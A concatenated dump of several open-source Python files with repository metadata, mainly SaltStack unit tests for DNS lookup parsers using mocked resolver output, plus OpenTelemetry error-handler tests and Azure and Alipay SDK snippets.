response_headers['x-ms-group']=self._deserialize('str', response.headers.get('x-ms-group'))
response_headers['x-ms-permissions']=self._deserialize('str', response.headers.get('x-ms-permissions'))
response_headers['x-ms-acl']=self._deserialize('str', response.headers.get('x-ms-acl'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
if cls:
return cls(pipeline_response, None, response_headers)
get_access_control.metadata = {'url': '/{filesystem}/{path}'} # type: ignore
|
dfe9d2f26789f32bda7a1dbe503684749123803d
|
d110546d747d7e3865ce5742d5fca09f404623c0
|
/tests/unit/utils/test_dns.py
|
75ceeef135901262b3017a9e186be38683766487
|
[
"Apache-2.0",
"MIT",
"BSD-2-Clause"
] |
permissive
|
saltstack/salt
|
354fc86a7be1f69514b3dd3b2edb9e6f66844c1d
|
1ef90cbdc7203f97775edb7666db86a41eb9fc15
|
refs/heads/master
| 2023-07-19T20:56:20.210556
| 2023-06-29T23:12:28
| 2023-07-19T11:47:47
| 1,390,248
| 11,026
| 6,296
|
Apache-2.0
| 2023-09-14T20:45:37
| 2011-02-20T20:16:56
|
Python
|
UTF-8
|
Python
| false
| false
| 28,220
|
py
|
test_dns.py
|
import logging
import socket
import textwrap
import pytest
import salt.modules.cmdmod
import salt.utils.dns
from salt._compat import ipaddress
from salt.utils.dns import (
_data2rec,
_data2rec_group,
_lookup_dig,
_lookup_drill,
_lookup_gai,
_lookup_host,
_lookup_nslookup,
_to_port,
_tree,
_weighted_order,
lookup,
)
from salt.utils.odict import OrderedDict
from tests.support.mock import MagicMock, patch
from tests.support.unit import TestCase
log = logging.getLogger(__name__)
class DNShelpersCase(TestCase):
"""
Tests for the parser helpers
"""
def test_port(self):
for right in (1, 42, "123", 65535):
self.assertEqual(_to_port(right), int(right))
for wrong in (0, 65536, 100000, "not-a-port"):
self.assertRaises(ValueError, _to_port, wrong)
def test_tree(self):
test_map = (
"ex1.nl",
"o.1.example.eu",
"a1a.b2b.c3c.example.com",
"c3c.example.co.uk",
"c3c.example.mil.ng",
)
res_map = (
["ex1.nl"],
["o.1.example.eu", "1.example.eu", "example.eu"],
[
"a1a.b2b.c3c.example.com",
"b2b.c3c.example.com",
"c3c.example.com",
"example.com",
],
["c3c.example.co.uk", "example.co.uk"],
["c3c.example.mil.ng", "example.mil.ng"],
)
for domain, result in zip(test_map, res_map):
self.assertEqual(_tree(domain), result)
def test_weight(self):
recs = [
[],
[{"weight": 100, "name": "nescio"}],
[
{"weight": 100, "name": "nescio1"},
{"weight": 100, "name": "nescio2"},
{"weight": 100, "name": "nescio3"},
{"weight": 100, "name": "nescio4"},
{"weight": 100, "name": "nescio5"},
{"weight": 100, "name": "nescio6"},
{"weight": 100, "name": "nescio7"},
{"weight": 100, "name": "nescio8"},
],
]
# What are the odds of this tripping over a build
# 1/(8!^4) builds?
self.assertNotEqual(
_weighted_order(list(recs[-1])),
_weighted_order(list(recs[-1])),
_weighted_order(list(recs[-1])),
)
for recset in recs:
rs_res = _weighted_order(list(recset))
self.assertTrue(all(rec["name"] in rs_res for rec in recset))
def test_data2rec(self):
right = [
"10.0.0.1",
"10 mbox.example.com",
"10 20 30 example.com",
]
schemas = [
OrderedDict((("address", ipaddress.IPv4Address),)),
OrderedDict(
(
("preference", int),
("name", str),
)
),
OrderedDict(
(
("prio", int),
("weight", int),
("port", _to_port),
("name", str),
)
),
]
results = [
ipaddress.IPv4Address(right[0]),
{"preference": 10, "name": "mbox.example.com"},
{"prio": 10, "weight": 20, "port": 30, "name": "example.com"},
]
for rdata, rschema, res in zip(right, schemas, results):
self.assertEqual(_data2rec(rschema, rdata), res)
wrong = [
"not-an-ip",
"hundred 20 30 interror.example.com",
"10 toolittle.example.com",
]
for rdata, rschema in zip(wrong, schemas):
self.assertRaises(ValueError, _data2rec, rschema, rdata)
def test_data2group(self):
right = [
["10 mbox.example.com"],
[
"10 mbox1.example.com",
"20 mbox2.example.com",
"20 mbox3.example.com",
"30 mbox4.example.com",
"30 mbox5.example.com",
"30 mbox6.example.com",
],
]
rschema = OrderedDict(
(
("prio", int),
("srvr", str),
)
)
results = [
OrderedDict([(10, ["mbox.example.com"])]),
OrderedDict(
[
(10, ["mbox1.example.com"]),
(20, ["mbox2.example.com", "mbox3.example.com"]),
(
30,
["mbox4.example.com", "mbox5.example.com", "mbox6.example.com"],
),
]
),
]
for rdata, res in zip(right, results):
group = _data2rec_group(rschema, rdata, "prio")
self.assertEqual(group, res)
class DNSlookupsCase(TestCase):
"""
Test the lookup result parsers
Note that by far and large the parsers actually
completely ignore the input name or output content
only nslookup is bad enough to be an exception to that
a lookup function
- raises ValueError when an incorrect DNS type is given
- returns False upon error
- returns [*record-data] upon succes/no records
"""
CMD_RET = {"pid": 12345, "retcode": 0, "stderr": "", "stdout": ""}
RESULTS = {
"A": [
["10.1.1.1"], # one-match
["10.1.1.1", "10.2.2.2", "10.3.3.3"], # multi-match
],
"AAAA": [
["2a00:a00:b01:c02:d03:e04:f05:111"], # one-match
[
"2a00:a00:b01:c02:d03:e04:f05:111",
"2a00:a00:b01:c02:d03:e04:f05:222",
"2a00:a00:b01:c02:d03:e04:f05:333",
], # multi-match
],
"CAA": [['0 issue "exampleca.com"', '0 iodef "mailto:sslabuse@example.com"']],
"CNAME": [["web.example.com."]],
"MX": [
["10 mx1.example.com."],
["10 mx1.example.com.", "20 mx2.example.eu.", "30 mx3.example.nl."],
],
"SSHFP": [
[
"1 1 0aabda8af5418108e8a5d3f90f207226b2c89fbe",
"1 2 500ca871d8e255e01f1261a2370c4e5406b8712f19916d3ab9f86344a67e5597",
"3 1 a3b605ce6f044617c6077c46a7cd5d17a767f0d5",
"4 2 0360d0a5a2fa550f972259e7374533add7ac8e5f303322a5b8e208bbc859ab1b",
]
],
"TXT": [
[
"v=spf1 a include:_spf4.example.com include:mail.example.eu"
" ip4:10.0.0.0/8 ip6:2a00:a00:b01::/48 ~all"
]
],
}
def _mock_cmd_ret(self, delta_res):
"""
Take CMD_RET and update it w/(a list of ) delta_res
Mock cmd.run_all w/it
:param delta_res: list or dict
:return: patched cmd.run_all
"""
if isinstance(delta_res, (list, tuple)):
test_res = []
for dres in delta_res:
tres = self.CMD_RET.copy()
tres.update(dres)
test_res.append(tres)
cmd_mock = MagicMock(side_effect=test_res)
else:
test_res = self.CMD_RET.copy()
test_res.update(delta_res)
cmd_mock = MagicMock(return_value=test_res)
return patch.dict(
salt.utils.dns.__salt__, {"cmd.run_all": cmd_mock}, clear=True
)
def _test_cmd_lookup(
self, lookup_cb, wrong_type, wrong, right, empty=None, secure=None
):
"""
Perform a given battery of tests against a given lookup utilizing cmd.run_all
:param wrong_type: delta cmd.run_all output for an incorrect DNS type
:param wrong: delta cmd.run_all output for any error
:param right: delta cmd.run_all output for outputs in RESULTS
:param empty: delta cmd.run_all output for anything that won't return matches
:param secure: delta cmd.run_all output for secured RESULTS
"""
# wrong
for wrong in wrong:
with self._mock_cmd_ret(wrong):
self.assertEqual(lookup_cb("mockq", "A"), False)
# empty response
if empty is None:
empty = {}
with self._mock_cmd_ret(empty):
self.assertEqual(lookup_cb("mockq", "AAAA"), [])
# wrong types
with self._mock_cmd_ret(wrong_type):
self.assertRaises(ValueError, lookup_cb, "mockq", "WRONG")
# Regular outputs
for rec_t, tests in right.items():
with self._mock_cmd_ret([dict([("stdout", dres)]) for dres in tests]):
for test_res in self.RESULTS[rec_t]:
if rec_t in ("A", "AAAA", "CNAME", "SSHFP"):
rec = "mocksrvr.example.com"
else:
rec = "example.com"
lookup_res = lookup_cb(rec, rec_t)
if rec_t == "SSHFP":
# Some resolvers 'split' the output and/or capitalize differently.
# So we need to workaround that here as well
lookup_res = [
res[:4] + res[4:].replace(" ", "").lower()
for res in lookup_res
]
self.assertEqual(
lookup_res,
test_res,
# msg='Error parsing {0} returns'.format(rec_t)
)
if not secure:
return
# Regular outputs are insecure outputs (e.g. False)
for rec_t, tests in right.items():
with self._mock_cmd_ret([dict([("stdout", dres)]) for dres in tests]):
for _ in self.RESULTS[rec_t]:
self.assertEqual(
lookup_cb("mocksrvr.example.com", rec_t, secure=True),
False,
msg="Insecure {} returns should not be returned".format(rec_t),
)
for rec_t, tests in secure.items():
with self._mock_cmd_ret([dict([("stdout", dres)]) for dres in tests]):
for test_res in self.RESULTS[rec_t]:
self.assertEqual(
lookup_cb("mocksrvr.example.com", rec_t, secure=True),
test_res,
msg="Error parsing DNSSEC'd {} returns".format(rec_t),
)
@pytest.mark.skipif(
not salt.utils.dns.HAS_NSLOOKUP, reason="nslookup is not available"
)
@pytest.mark.requires_network
def test_lookup_with_servers(self):
rights = {
"A": [
"Name:\tmocksrvr.example.com\nAddress: 10.1.1.1",
"Name:\tmocksrvr.example.com\nAddress: 10.1.1.1\n"
"Name:\tweb.example.com\nAddress: 10.2.2.2\n"
"Name:\tweb.example.com\nAddress: 10.3.3.3",
],
"AAAA": [
"mocksrvr.example.com\thas AAAA address"
" 2a00:a00:b01:c02:d03:e04:f05:111",
"mocksrvr.example.com\tcanonical name = web.example.com.\n"
"web.example.com\thas AAAA address 2a00:a00:b01:c02:d03:e04:f05:111\n"
"web.example.com\thas AAAA address 2a00:a00:b01:c02:d03:e04:f05:222\n"
"web.example.com\thas AAAA address 2a00:a00:b01:c02:d03:e04:f05:333",
],
"CNAME": ["mocksrvr.example.com\tcanonical name = web.example.com."],
"MX": [
"example.com\tmail exchanger = 10 mx1.example.com.",
"example.com\tmail exchanger = 10 mx1.example.com.\n"
"example.com\tmail exchanger = 20 mx2.example.eu.\n"
"example.com\tmail exchanger = 30 mx3.example.nl.",
],
"TXT": [
'example.com\ttext = "v=spf1 a include:_spf4.example.com'
' include:mail.example.eu ip4:10.0.0.0/8 ip6:2a00:a00:b01::/48 ~all"'
],
}
for rec_t, tests in rights.items():
with self._mock_cmd_ret([dict([("stdout", dres)]) for dres in tests]):
for test_res in self.RESULTS[rec_t]:
if rec_t in ("A", "AAAA", "CNAME"):
rec = "mocksrvr.example.com"
else:
rec = "example.com"
self.assertEqual(
lookup(rec, rec_t, method="nslookup", servers="8.8.8.8"),
test_res,
)
@pytest.mark.skipif(not salt.utils.dns.HAS_DIG, reason="dig is not available")
def test_dig_options(self):
cmd = "dig {} -v".format(salt.utils.dns.DIG_OPTIONS)
cmd = salt.modules.cmdmod.retcode(
cmd, python_shell=False, output_loglevel="quiet"
)
self.assertEqual(cmd, 0)
def test_dig(self):
wrong_type = {"retcode": 0, "stderr": ";; Warning, ignoring invalid type ABC"}
wrongs = [
{
"retcode": 9,
"stderr": ";; connection timed out; no servers could be reached",
},
]
# example returns for dig +search +fail +noall +answer +noclass +nosplit +nottl -t {rtype} {name}
rights = {
"A": [
"mocksrvr.example.com.\tA\t10.1.1.1",
"web.example.com.\t\tA\t10.1.1.1\n"
"web.example.com.\t\tA\t10.2.2.2\n"
"web.example.com.\t\tA\t10.3.3.3",
],
"AAAA": [
"mocksrvr.example.com.\tA\t2a00:a00:b01:c02:d03:e04:f05:111",
"mocksrvr.example.com.\tCNAME\tweb.example.com.\n"
"web.example.com.\t\tAAAA\t2a00:a00:b01:c02:d03:e04:f05:111\n"
"web.example.com.\t\tAAAA\t2a00:a00:b01:c02:d03:e04:f05:222\n"
"web.example.com.\t\tAAAA\t2a00:a00:b01:c02:d03:e04:f05:333",
],
"CAA": [
'example.com.\t\tCAA\t0 issue "exampleca.com"\n'
'example.com.\t\tCAA\t0 iodef "mailto:sslabuse@example.com"'
],
"CNAME": ["mocksrvr.example.com.\tCNAME\tweb.example.com."],
"MX": [
"example.com.\t\tMX\t10 mx1.example.com.",
"example.com.\t\tMX\t10 mx1.example.com.\nexample.com.\t\tMX\t20"
" mx2.example.eu.\nexample.com.\t\tMX\t30 mx3.example.nl.",
],
"SSHFP": [
"mocksrvr.example.com.\tSSHFP\t1 1"
" 0AABDA8AF5418108E8A5D3F90F207226B2C89FBE\nmocksrvr.example.com.\tSSHFP\t1"
" 2 500CA871D8E255E01F1261A2370C4E5406B8712F19916D3AB9F86344A67E5597\nmocksrvr.example.com.\tSSHFP\t3"
" 1 A3B605CE6F044617C6077C46A7CD5D17A767F0D5\nmocksrvr.example.com.\tSSHFP\t4"
" 2 0360D0A5A2FA550F972259E7374533ADD7AC8E5F303322A5B8E208BBC859AB1B"
],
"TXT": [
'example.com.\tTXT\t"v=spf1 a include:_spf4.example.com'
' include:mail.example.eu ip4:10.0.0.0/8 ip6:2a00:a00:b01::/48 ~all"'
],
}
secure = {
"A": [
"mocksrvr.example.com.\tA\t10.1.1.1\nmocksrvr.example.com.\tRRSIG\tA 8"
" 3 7200 20170420000000 20170330000000 1629 example.com."
" Hv4p37EF55LKBxUNYpnhWiEYqfmMct0z0WgDJyG5reqYfl+z4HX/kaoi"
" Wr2iCYuYeB4Le7BgnMSb77UGHPWE7lCQ8z5gkgJ9rCDrooJzSTVdnHfw"
" 1JQ7txRSp8Rj2GLf/L3Ytuo6nNZTV7bWUkfhOs61DAcOPHYZiX8rVhIh UAE=",
"web.example.com.\t\tA\t10.1.1.1\nweb.example.com.\t\tA\t10.2.2.2\nweb.example.com.\t\tA\t10.3.3.3\nweb.example.com.\tRRSIG\tA"
" 8 3 7200 20170420000000 20170330000000 1629 example.com."
" Hv4p37EF55LKBxUNYpnhWiEYqfmMct0z0WgDJyG5reqYfl+z4HX/kaoi"
" Wr2iCYuYeB4Le7BgnMSb77UGHPWE7lCQ8z5gkgJ9rCDrooJzSTVdnHfw"
" 1JQ7txRSp8Rj2GLf/L3Ytuo6nNZTV7bWUkfhOs61DAcOPHYZiX8rVhIh UAE=",
]
}
self._test_cmd_lookup(
_lookup_dig,
wrong=wrongs,
right=rights,
wrong_type=wrong_type,
secure=secure,
)
def test_drill(self):
# all Drill returns look like this
RES_TMPL = textwrap.dedent(
"""\
;; ->>HEADER<<- opcode: QUERY, rcode: NOERROR, id: 58233
;; flags: qr rd ra ; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;; mocksrvr.example.com.\tIN\tA
;; ANSWER SECTION:
{}
;; AUTHORITY SECTION:
;; ADDITIONAL SECTION:
;; Query time: 37 msec
;; SERVER: 10.100.150.129
;; WHEN: Tue Apr 4 19:03:51 2017
;; MSG SIZE rcvd: 50
"""
)
# Not even a different retcode!?
wrong_type = {
"stdout": RES_TMPL.format("mocksrvr.example.com.\t4404\tIN\tA\t10.1.1.1\n")
}
wrongs = [
{
"retcode": 1,
"stderr": (
"Error: error sending query: No (valid) nameservers defined in the"
" resolver"
),
}
]
# example returns for drill {rtype} {name}
rights = {
"A": [
"mocksrvr.example.com.\t4404\tIN\tA\t10.1.1.1\n",
"web.example.com.\t4404\tIN\tA\t10.1.1.1\n"
"web.example.com.\t4404\tIN\tA\t10.2.2.2\n"
"web.example.com.\t4404\tIN\tA\t10.3.3.3",
],
"AAAA": [
"mocksrvr.example.com.\t4404\tIN\tAAAA\t2a00:a00:b01:c02:d03:e04:f05:111",
"mocksrvr.example.com.\t4404\tIN\tCNAME\tweb.example.com.\n"
"web.example.com.\t4404\tIN\tAAAA\t2a00:a00:b01:c02:d03:e04:f05:111\n"
"web.example.com.\t4404\tIN\tAAAA\t2a00:a00:b01:c02:d03:e04:f05:222\n"
"web.example.com.\t4404\tIN\tAAAA\t2a00:a00:b01:c02:d03:e04:f05:333",
],
"CAA": [
'example.com.\t1144\tIN\tCAA\t0 issue "exampleca.com"\n'
'example.com.\t1144\tIN\tCAA\t0 iodef "mailto:sslabuse@example.com"'
],
"CNAME": ["mocksrvr.example.com.\t4404\tIN\tCNAME\tweb.example.com."],
"MX": [
"example.com.\t4404\tIN\tMX\t10 mx1.example.com.",
"example.com.\t4404\tIN\tMX\t10 mx1.example.com.\n"
"example.com.\t4404\tIN\tMX\t20 mx2.example.eu.\n"
"example.com.\t4404\tIN\tMX\t30 mx3.example.nl.",
],
"SSHFP": [
"mocksrvr.example.com.\t3339\tIN\tSSHFP\t1 1"
" 0aabda8af5418108e8a5d3f90f207226b2c89fbe\nmocksrvr.example.com.\t3339\tIN\tSSHFP\t1"
" 2 500ca871d8e255e01f1261a2370c4e5406b8712f19916d3ab9f86344a67e5597\nmocksrvr.example.com.\t3339\tIN\tSSHFP\t3"
" 1 a3b605ce6f044617c6077c46a7cd5d17a767f0d5\nmocksrvr.example.com.\t3339\tIN\tSSHFP\t4"
" 2 0360d0a5a2fa550f972259e7374533add7ac8e5f303322a5b8e208bbc859ab1b"
],
"TXT": [
'example.com.\t4404\tIN\tTXT\t"v=spf1 a include:_spf4.example.com'
' include:mail.example.eu ip4:10.0.0.0/8 ip6:2a00:a00:b01::/48 ~all"'
],
}
secure = {
"A": [
"mocksrvr.example.com.\t4404\tIN\tA\t10.1.1.1\nmocksrvr.example.com.\t4404\tIN\tRRSIG\tA"
" 8 3 7200 20170420000000 20170330000000 1629 example.com."
" Hv4p37EF55LKBxUNYpnhWiEYqfmMct0z0WgDJyG5reqYfl+z4HX/kaoi"
" Wr2iCYuYeB4Le7BgnMSb77UGHPWE7lCQ8z5gkgJ9rCDrooJzSTVdnHfw"
" 1JQ7txRSp8Rj2GLf/L3Ytuo6nNZTV7bWUkfhOs61DAcOPHYZiX8rVhIh UAE=",
"web.example.com.\t4404\tIN\tA\t10.1.1.1\nweb.example.com.\t4404\tIN\tA\t10.2.2.2\nweb.example.com.\t4404\tIN\tA\t10.3.3.3\nweb.example.com.\t4404\tIN\tRRSIG\tA"
" 8 3 7200 20170420000000 20170330000000 1629 example.com."
" Hv4p37EF55LKBxUNYpnhWiEYqfmMct0z0WgDJyG5reqYfl+z4HX/kaoi"
" Wr2iCYuYeB4Le7BgnMSb77UGHPWE7lCQ8z5gkgJ9rCDrooJzSTVdnHfw"
" 1JQ7txRSp8Rj2GLf/L3Ytuo6nNZTV7bWUkfhOs61DAcOPHYZiX8rVhIh UAE=",
]
}
for rec_d in rights, secure:
for rec_t, tests in rec_d.items():
for idx, test in enumerate(tests):
rec_d[rec_t][idx] = RES_TMPL.format(test)
self._test_cmd_lookup(
_lookup_drill,
wrong_type=wrong_type,
wrong=wrongs,
right=rights,
secure=secure,
)
def test_gai(self):
# wrong type
self.assertRaises(ValueError, _lookup_gai, "mockq", "WRONG")
# wrong
with patch.object(
socket, "getaddrinfo", MagicMock(side_effect=socket.gaierror)
):
for rec_t in ("A", "AAAA"):
self.assertEqual(False, _lookup_gai("mockq", rec_t))
# example returns from getaddrinfo
right = {
"A": [
[(2, 3, 3, "", ("10.1.1.1", 0))],
[
(2, 3, 3, "", ("10.1.1.1", 0)),
(2, 3, 3, "", ("10.2.2.2", 0)),
(2, 3, 3, "", ("10.3.3.3", 0)),
],
],
"AAAA": [
[(10, 3, 3, "", ("2a00:a00:b01:c02:d03:e04:f05:111", 0, 0, 0))],
[
(10, 3, 3, "", ("2a00:a00:b01:c02:d03:e04:f05:111", 0, 0, 0)),
(10, 3, 3, "", ("2a00:a00:b01:c02:d03:e04:f05:222", 0, 0, 0)),
(10, 3, 3, "", ("2a00:a00:b01:c02:d03:e04:f05:333", 0, 0, 0)),
],
],
}
for rec_t, tests in right.items():
with patch.object(socket, "getaddrinfo", MagicMock(side_effect=tests)):
for test_res in self.RESULTS[rec_t]:
self.assertEqual(
_lookup_gai("mockq", rec_t),
test_res,
msg="Error parsing {} returns".format(rec_t),
)
def test_host(self):
wrong_type = {"retcode": 9, "stderr": "host: invalid type: WRONG"}
wrongs = [
{
"retcode": 9,
"stderr": ";; connection timed out; no servers could be reached",
}
]
empty = {"stdout": "www.example.com has no MX record"}
# example returns for host -t {rdtype} {name}
rights = {
"A": [
"mocksrvr.example.com has address 10.1.1.1",
"web.example.com has address 10.1.1.1\n"
"web.example.com has address 10.2.2.2\n"
"web.example.com has address 10.3.3.3",
],
"AAAA": [
"mocksrvr.example.com has IPv6 address"
" 2a00:a00:b01:c02:d03:e04:f05:111",
"mocksrvr.example.com is an alias for web.example.com.\n"
"web.example.com has IPv6 address 2a00:a00:b01:c02:d03:e04:f05:111\n"
"web.example.com has IPv6 address 2a00:a00:b01:c02:d03:e04:f05:222\n"
"web.example.com has IPv6 address 2a00:a00:b01:c02:d03:e04:f05:333",
],
"CAA": [
'example.com has CAA record 0 issue "exampleca.com"\n'
'example.com has CAA record 0 iodef "mailto:sslabuse@example.com"'
],
"CNAME": ["mocksrvr.example.com is an alias for web.example.com."],
"MX": [
"example.com mail is handled by 10 mx1.example.com.",
"example.com mail is handled by 10 mx1.example.com.\n"
"example.com mail is handled by 20 mx2.example.eu.\n"
"example.com mail is handled by 30 mx3.example.nl.",
],
"SSHFP": [
"mocksrvr.example.com has SSHFP record 1 1"
" 0AABDA8AF5418108E8A5D3F90F207226B2C89FBE\nmocksrvr.example.com has"
" SSHFP record 1 2"
" 500CA871D8E255E01F1261A2370C4E5406B8712F19916D3AB9F86344"
" A67E5597\nmocksrvr.example.com has SSHFP record 3 1"
" A3B605CE6F044617C6077C46A7CD5D17A767F0D5\nmocksrvr.example.com has"
" SSHFP record 4 2"
" 0360D0A5A2FA550F972259E7374533ADD7AC8E5F303322A5B8E208BB C859AB1B"
],
"TXT": [
'example.com descriptive text "v=spf1 a include:_spf4.example.com'
' include:mail.example.eu ip4:10.0.0.0/8 ip6:2a00:a00:b01::/48 ~all"'
],
}
self._test_cmd_lookup(
_lookup_host, wrong_type=wrong_type, wrong=wrongs, right=rights, empty=empty
)
def test_nslookup(self):
# all nslookup returns look like this
RES_TMPL = textwrap.dedent(
"""\
Server:\t\t10.11.12.13
Address:\t10.11.12.13#53
Non-authoritative answer:
{}
Authoritative answers can be found from:
"""
)
wrong_type = {
"stdout": "unknown query type: WRONG"
+ RES_TMPL.format("Name:\tmocksrvr.example.com\nAddress: 10.1.1.1")
}
wrongs = [
{
"retcode": 1,
"stdout": ";; connection timed out; no servers could be reached",
}
]
empty = {"stdout": RES_TMPL.format("*** Can't find www.google.com: No answer")}
# Example returns of nslookup -query={rdype} {name}
rights = {
"A": [
"Name:\tmocksrvr.example.com\nAddress: 10.1.1.1",
"Name:\tmocksrvr.example.com\nAddress: 10.1.1.1\n"
"Name:\tweb.example.com\nAddress: 10.2.2.2\n"
"Name:\tweb.example.com\nAddress: 10.3.3.3",
],
"AAAA": [
"mocksrvr.example.com\thas AAAA address"
" 2a00:a00:b01:c02:d03:e04:f05:111",
"mocksrvr.example.com\tcanonical name = web.example.com.\n"
"web.example.com\thas AAAA address 2a00:a00:b01:c02:d03:e04:f05:111\n"
"web.example.com\thas AAAA address 2a00:a00:b01:c02:d03:e04:f05:222\n"
"web.example.com\thas AAAA address 2a00:a00:b01:c02:d03:e04:f05:333",
],
"CAA": [
'example.com\trdata_257 = 0 issue "exampleca.com"\n'
'example.com\trdata_257 = 0 iodef "mailto:sslabuse@example.com"'
],
"CNAME": ["mocksrvr.example.com\tcanonical name = web.example.com."],
"MX": [
"example.com\tmail exchanger = 10 mx1.example.com.",
"example.com\tmail exchanger = 10 mx1.example.com.\n"
"example.com\tmail exchanger = 20 mx2.example.eu.\n"
"example.com\tmail exchanger = 30 mx3.example.nl.",
],
"SSHFP": [
"mocksrvr.example.com\trdata_44 = 1 1"
" 0AABDA8AF5418108E8A5D3F90F207226B2C89FBE\nmocksrvr.example.com\trdata_44"
" = 1 2 500CA871D8E255E01F1261A2370C4E5406B8712F19916D3AB9F86344"
" A67E5597\nmocksrvr.example.com\trdata_44 = 3 1"
" A3B605CE6F044617C6077C46A7CD5D17A767F0D5\nmocksrvr.example.com\trdata_44"
" = 4 2 0360D0A5A2FA550F972259E7374533ADD7AC8E5F303322A5B8E208BB"
" C859AB1B"
],
"TXT": [
'example.com\ttext = "v=spf1 a include:_spf4.example.com'
' include:mail.example.eu ip4:10.0.0.0/8 ip6:2a00:a00:b01::/48 ~all"'
],
}
for rec_t, tests in rights.items():
for idx, test in enumerate(tests):
rights[rec_t][idx] = RES_TMPL.format(test)
self._test_cmd_lookup(
_lookup_nslookup,
wrong_type=wrong_type,
wrong=wrongs,
right=rights,
empty=empty,
)
|
53cc911d4594339f904750e1967d53c707e9b08e
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/response/AlipayUserPassGrouplistQueryResponse.py
|
abac9c969cc731275b415b8ebcd5e2edbe324520
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 1,133
|
py
|
AlipayUserPassGrouplistQueryResponse.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.PassInfoOpenApiModel import PassInfoOpenApiModel
class AlipayUserPassGrouplistQueryResponse(AlipayResponse):
def __init__(self):
super(AlipayUserPassGrouplistQueryResponse, self).__init__()
self._pass_info_list = None
@property
def pass_info_list(self):
return self._pass_info_list
@pass_info_list.setter
def pass_info_list(self, value):
if isinstance(value, list):
self._pass_info_list = list()
for i in value:
if isinstance(i, PassInfoOpenApiModel):
self._pass_info_list.append(i)
else:
self._pass_info_list.append(PassInfoOpenApiModel.from_alipay_dict(i))
def parse_response_content(self, response_content):
response = super(AlipayUserPassGrouplistQueryResponse, self).parse_response_content(response_content)
if 'pass_info_list' in response:
self.pass_info_list = response['pass_info_list']
|
af58143b873cb02cf0eac368b7a91601cde70d7c
|
21590487701d2dcbe1a1c1dd81c6e983f7523cb6
|
/opentelemetry-sdk/tests/error_handler/test_error_handler.py
|
116771dc9a13cdb8aee42c497b7f3c52aa987c13
|
[
"Apache-2.0"
] |
permissive
|
open-telemetry/opentelemetry-python
|
837199e541c03cff311cad075401791ee2a23583
|
d8490c5f557dd7005badeb800095cb51b553c98c
|
refs/heads/main
| 2023-08-26T06:47:23.837997
| 2023-08-17T22:35:13
| 2023-08-17T22:35:13
| 185,478,926
| 1,361
| 668
|
Apache-2.0
| 2023-09-14T20:48:40
| 2019-05-07T21:13:30
|
Python
|
UTF-8
|
Python
| false
| false
| 4,242
|
py
|
test_error_handler.py
|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=broad-except
from logging import ERROR
from unittest import TestCase
from unittest.mock import Mock, patch
from opentelemetry.sdk.error_handler import (
ErrorHandler,
GlobalErrorHandler,
logger,
)
class TestErrorHandler(TestCase):
@patch("opentelemetry.sdk.error_handler.entry_points")
def test_default_error_handler(self, mock_entry_points):
with self.assertLogs(logger, ERROR):
with GlobalErrorHandler():
raise Exception("some exception")
# pylint: disable=no-self-use
@patch("opentelemetry.sdk.error_handler.entry_points")
def test_plugin_error_handler(self, mock_entry_points):
class ZeroDivisionErrorHandler(ErrorHandler, ZeroDivisionError):
# pylint: disable=arguments-differ
_handle = Mock()
class AssertionErrorHandler(ErrorHandler, AssertionError):
# pylint: disable=arguments-differ
_handle = Mock()
mock_entry_point_zero_division_error_handler = Mock()
mock_entry_point_zero_division_error_handler.configure_mock(
**{"load.return_value": ZeroDivisionErrorHandler}
)
mock_entry_point_assertion_error_handler = Mock()
mock_entry_point_assertion_error_handler.configure_mock(
**{"load.return_value": AssertionErrorHandler}
)
mock_entry_points.configure_mock(
**{
"return_value": [
mock_entry_point_zero_division_error_handler,
mock_entry_point_assertion_error_handler,
]
}
)
error = ZeroDivisionError()
with GlobalErrorHandler():
raise error
# pylint: disable=protected-access
ZeroDivisionErrorHandler._handle.assert_called_with(error)
error = AssertionError()
with GlobalErrorHandler():
raise error
AssertionErrorHandler._handle.assert_called_with(error)
@patch("opentelemetry.sdk.error_handler.entry_points")
def test_error_in_handler(self, mock_entry_points):
class ErrorErrorHandler(ErrorHandler, ZeroDivisionError):
# pylint: disable=arguments-differ
def _handle(self, error: Exception):
assert False
mock_entry_point_error_error_handler = Mock()
mock_entry_point_error_error_handler.configure_mock(
**{"load.return_value": ErrorErrorHandler}
)
mock_entry_points.configure_mock(
**{"return_value": [mock_entry_point_error_error_handler]}
)
error = ZeroDivisionError()
with self.assertLogs(logger, ERROR):
with GlobalErrorHandler():
raise error
# pylint: disable=no-self-use
@patch("opentelemetry.sdk.error_handler.entry_points")
def test_plugin_error_handler_context_manager(self, mock_entry_points):
mock_error_handler_instance = Mock()
class MockErrorHandlerClass(IndexError):
def __new__(cls):
return mock_error_handler_instance
mock_entry_point_error_handler = Mock()
mock_entry_point_error_handler.configure_mock(
**{"load.return_value": MockErrorHandlerClass}
)
mock_entry_points.configure_mock(
**{"return_value": [mock_entry_point_error_handler]}
)
error = IndexError()
with GlobalErrorHandler():
raise error
with GlobalErrorHandler():
pass
# pylint: disable=protected-access
mock_error_handler_instance._handle.assert_called_once_with(error)
|
39edded15d7ecc9bf3c766f50f4a3ceaf2864fc3
|
3dc3bbe607ab7b583eb52dbaae86636eb642960a
|
/mmaction/structures/__init__.py
|
ec6f4be8ead8a1d709001da080633b949d66e355
|
[
"Apache-2.0"
] |
permissive
|
open-mmlab/mmaction2
|
